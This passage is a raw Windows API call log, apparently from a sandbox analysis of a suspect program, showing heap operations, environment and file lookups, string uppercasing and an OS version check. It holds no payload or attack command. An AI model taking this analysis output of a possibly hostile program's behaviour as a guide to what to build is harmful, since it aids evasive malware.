Flags=0x0, Size=0xc) returned 0x34aa340 [0258.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0258.951] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0258.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0258.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0258.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0258.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0258.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0258.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0258.954] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0258.954] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0258.954] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.954] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.954] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.954] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.955] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/S8aFA8f.mkv", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eaa2d20, ftCreationTime.dwHighDateTime=0x1d4cc59, ftLastAccessTime.dwLowDateTime=0x9d351340, ftLastAccessTime.dwHighDateTime=0x1d4cd86, ftLastWriteTime.dwLowDateTime=0x9d351340, ftLastWriteTime.dwHighDateTime=0x1d4cd86, nFileSizeHigh=0x0, nFileSizeLow=0x173f7, dwReserved0=0x50530, dwReserved1=0x12519, cFileName="S8aFA8f.mkv", cAlternateFileName="")) returned 0xaa5760 [0258.955] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0258.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.955] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.955] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.956] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.956] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.956] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.956] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.956] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.956] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.956] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.956] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.957] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.957] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0258.957] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.957] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.957] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0258.957] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.957] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0258.957] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.958] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.958] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.958] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.958] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.958] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.958] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0258.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0258.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.960] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.960] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.960] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.961] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.961] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.961] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.961] RtlAllocateHeap 